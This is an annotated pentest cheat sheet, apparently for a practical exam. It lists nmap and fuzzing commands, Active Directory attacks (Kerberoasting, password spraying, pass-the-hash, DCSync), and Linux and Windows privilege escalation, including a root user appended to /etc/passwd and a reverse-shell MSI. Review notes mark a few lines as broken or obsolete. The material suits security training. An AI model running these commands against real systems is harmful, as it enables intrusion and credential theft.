Comprehensive practical exam covering the full pentest lifecycle. Requires professional-grade report writing.
# ---------------------------------------------------------------------------
# Network discovery (nmap)
# ---------------------------------------------------------------------------
# Initial discovery: host sweep (-sn = no port scan). -oG writes grepable
# output to sweep.txt; stdout keeps the normal format, where the phrase is
# "Host is up" (lowercase), so `grep Up` on the pipe likely matches nothing —
# the "Status: Up" lines it was probably meant to catch are in sweep.txt.
nmap -sn 10.10.10.0/24 -oG sweep.txt | grep Up
# Full port TCP: all 65535 ports, --open lists only open ones, -sV/-sC add
# version detection and default scripts; -oA writes tcp.nmap/.gnmap/.xml.
nmap -p- --open -sV -sC --min-rate=1000 -oA tcp target
# Aggressive + scripts (-A = OS detection, version, scripts, traceroute)
nmap -T4 -A -v target
# Service-specific scripts (NSE script names/globs per service port)
nmap --script http-enum,http-title -p 80,443,8080 target
nmap --script smb-vuln* -p 445 target
nmap --script ftp-anon -p 21 target
# UDP top 20 (UDP scans are slow; -sV helps confirm open|filtered results)
nmap -sU --top-ports 20 -sV target
# ---------------------------------------------------------------------------
# Web enumeration (ffuf / gobuster / arjun); wordlists from SecLists
# ---------------------------------------------------------------------------
# Directory/file discovery: -fc 404 hides not-found responses, -t 100 threads
ffuf -u http://target/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -fc 404 -t 100
# -x appends the listed extensions to each word; -o saves results to dirs.txt
gobuster dir -u http://target -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,js,txt -o dirs.txt
# vHost discovery: FUZZ is substituted into the Host header. NOTE(review):
# the trailing -fs is incomplete — ffuf's -fs expects a response-size value
# (the size of the default vhost's response); as written the line will not
# run.
ffuf -u http://target -H "Host: FUZZ.target.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fc 200 -fs
# Parameters: fuzz the query-string key; arjun guesses parameter names itself
ffuf -u http://target/page?FUZZ=value -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
arjun -u http://target/api/endpoint
# API endpoint discovery
ffuf -u http://target/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt
# ---------------------------------------------------------------------------
# Active Directory (impacket / bloodhound-python / CrackMapExec "cme")
# ---------------------------------------------------------------------------
# 1. Initial enumeration: collect all BloodHound data via the named DC (-ns)
#    and zip it for import. Generates heavy LDAP/SMB traffic to the DC.
bloodhound-python -d domain.htb -u user -p pass -ns dc01_ip -c all --zip
# 2. Kerberoast: request service tickets for SPN-bearing accounts (-request)
#    and save them in hashcat format; -m 13100 is Kerberos 5 TGS-REP etype 23.
#    rockyou.txt is given relative to the current directory.
GetUserSPNs.py domain.htb/user:pass -dc-ip dc01 -request -outputfile spns.txt
hashcat -m 13100 spns.txt rockyou.txt -r rules/best64.rule
# 3. AS-REP Roast: accounts in users.txt without Kerberos pre-auth
GetNPUsers.py domain.htb/ -usersfile users.txt -dc-ip dc01 -format hashcat -outputfile asrep.txt
# 4. Password spray: one password against every user in users.txt;
#    --continue-on-success keeps going after the first valid login.
#    Each attempt is a logon event on the target — lockout policy applies.
cme smb dc01 -u users.txt -p 'Password123' --continue-on-success
# 5. Pass-the-Hash: -H takes LM:NT (LM part may be empty, as in ":NTHash");
#    --local-auth tries the local SAM account rather than a domain account.
cme smb 10.10.10.0/24 -u Administrator -H 'LMHASH:NTHASH' --local-auth
psexec.py domain/Admin@target -hashes :NTHash
# 6. DCSync: dump domain secrets with a password or with the NT hash
secretsdump.py domain/Admin:pass@dc01
secretsdump.py domain/Admin@dc01 -hashes :NTHash
# 7. Pass-the-Ticket (Windows tool for the first step, impacket for the second)
# Get ticket: Rubeus.exe tgtdeleg /target:cifs/server.domain.local /nowrap
# Use: export KRB5CCNAME=ticket.ccache; psexec.py -k -no-pass domain/admin@target
# ---------------------------------------------------------------------------
# Linux privilege escalation
# ---------------------------------------------------------------------------
# SUID binaries (stderr silenced to hide permission-denied noise)
find / -perm -u=s -type f 2>/dev/null
# Check against https://gtfobins.github.io/
# sudo -l then GTFOBins — each line below is one GTFOBins sudo entry
sudo vim -c ':!/bin/bash'
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo find . -exec /bin/bash \; -quit
# NOTE(review): --interactive was removed from nmap years ago; this entry only
# applies to very old nmap builds.
sudo nmap --interactive; !sh
# Cron abuse: list system-wide cron entries
cat /etc/crontab; ls -la /etc/cron.d/ /etc/cron.hourly/
# If script is writable: echo 'chmod +s /bin/bash' >> /path/to/script
# Capabilities (file capabilities, recursive from /)
getcap -r / 2>/dev/null
# python3 cap_setuid: python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Writable /etc/passwd: -1 produces an MD5-crypt ($1$) hash; the "..." in the
# next line is a placeholder for the hash the openssl command prints.
openssl passwd -1 -salt hacker hacker123
echo 'hacker:$1$hacker$...:0:0:root:/root:/bin/bash' >> /etc/passwd
# ---------------------------------------------------------------------------
# Windows privilege escalation — these lines are cmd/PowerShell, not bash
# ---------------------------------------------------------------------------
# Token impersonation (SeImpersonatePrivilege): whoami /priv lists the
# current token's privileges
whoami /priv
# PrintSpoofer (PowerShell invocation syntax: .\ runs from the current dir)
.\PrintSpoofer.exe -i -c powershell.exe
# GodPotato
.\GodPotato.exe -cmd "cmd /c whoami"
# Unquoted service paths: auto-start services outside C:\Windows.
# wmic is deprecated on recent Windows builds and may be absent.
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows"
# Create malicious binary at unquoted path segment
# AlwaysInstallElevated: the policy is only effective when the Installer key
# is set to 1 in both the HKCU and HKLM hives; this queries HKCU only.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# LHOST=x is a placeholder for the listener address; -f msi builds an installer
msfvenom -p windows/shell_reverse_tcp LHOST=x LPORT=4444 -f msi -o shell.msi
# /quiet /qn suppress the installer UI
msiexec /quiet /qn /i C:\Users\user\Desktop\shell.msi